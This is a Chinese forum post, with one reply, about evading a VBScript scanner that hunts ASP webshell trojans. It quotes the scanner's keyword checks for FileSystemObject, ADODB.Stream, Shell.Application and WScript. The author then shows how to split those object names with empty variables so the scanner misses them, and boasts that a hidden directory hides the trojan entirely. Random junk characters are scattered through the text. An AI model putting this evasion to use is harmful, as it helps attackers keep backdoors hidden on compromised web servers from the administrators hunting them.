从容应对ASP木马追捕

韩冰

网上盛传ASP木马追捕,据说有位叫blueeyes的大侠编制了一ASP代码检查你的网站中是否含有可疑ASP..

(ASP木马) 6 A! U9 P+ Z c你看 : # D2 V, v/ ^3 S　　　if instr(filetxt,"scripting.filesystemobject")>0 then fso = yes else fso = no 　　　if fso = yes then 　　　　　　if instr(filetxt,"deletefolder")>0 or instr(filetxt,"delete")>0 then del =yes else del = no / q, t2 U# ?2 ?: @6 g5 [　　　　　　if instr(filetxt,"opentextfile")>0 or instr(filetxt,"createtextfile")>0 or instr(filetxt,"openastextstream")>0 then create =yes else create = no 　　　　　　if instr(filetxt,"move")>0 then mov = yes else mov = no 　　　end if 　　　if instr(filetxt,"adodb.stream")>0 then stream = yes else stream = no 　　　if instr(filetxt,"shell.application")>0 then shell = yes else shell = no 3 ^8 b/ X! A4 H4 E) U1 Q# P　　　if instr(filetxt,"wscript")>0 then ws = yes else ws = no 　　　if instr(filetxt,"xmlhttp")>0 then xmlhttp =yes else xmlhttp = no # M! x# |: K8 J2 _: D3 X2 L　　　if instr(filetxt,"vbscript.encode")> 0 or instr(filetxt,"javascript.encode")> 0 then encode = yes else encode = no 　　　filetxt = "" " n1 Q" h* h- a" a2 p呵呵,厉害!!! 咱们的饭碗真的要被砸了吗? $ |: `, d$ \! O' [道高一尺;魔高一丈;看我的! 它不是检查创建对象里的字符串吗?好!我来加个空值的变量:

6 P" S4 A8 r, g" j# B + o0 }; Y0 C, X4 H0 o( V4 K/ P

set im=server.CreateObject("Scr"&b&"ipting.Dictionary") ; K0 l( z% b* }0 }' M" ]; ^set lP=server.CreateObject("Ado"&l&"db.Stream") ' f7 }# j3 L/ Oset fB=Server.CreateObject("Scr"&u&"ipting.FileSystemObject") Set tN=Server.CreateObject("WSC"&e&"RIPT.NETWORK") set sa=server.createobject("she"&e&"ll.application") ) N4 V0 w" M$ }7 G! ^+ Bset TV=server.createobject("WSC"&y&"RIPT.shell")

. i. u& l, V1 ]/ K, C1 N6 `4 ?

哈哈;刚刚加进一只眼我们可爱的蓝眼睛就视而不见啦! 别忘了:我们加的是空值变量,而空值变量的名字在不违反ASP规则的前提下是可以随意起名字的 {; u& k+ `5 D+ J8 a中文英文;呵呵万国文字.蓝眼睛视力再好也是睁眼瞎耶 BTW:其实把马放在我们那个小秘密里说的目录里蓝眼睛连哪个目录都看不见更别说看马里的代码了 * ?" Q E$ F4 z; k: I3 ~; N让蓝眼睛望马兴叹吧!!!....over

ilikenba

是不是可以找到CreateObject，然后将他的括号里面的东西付给一个变量运行后再判断！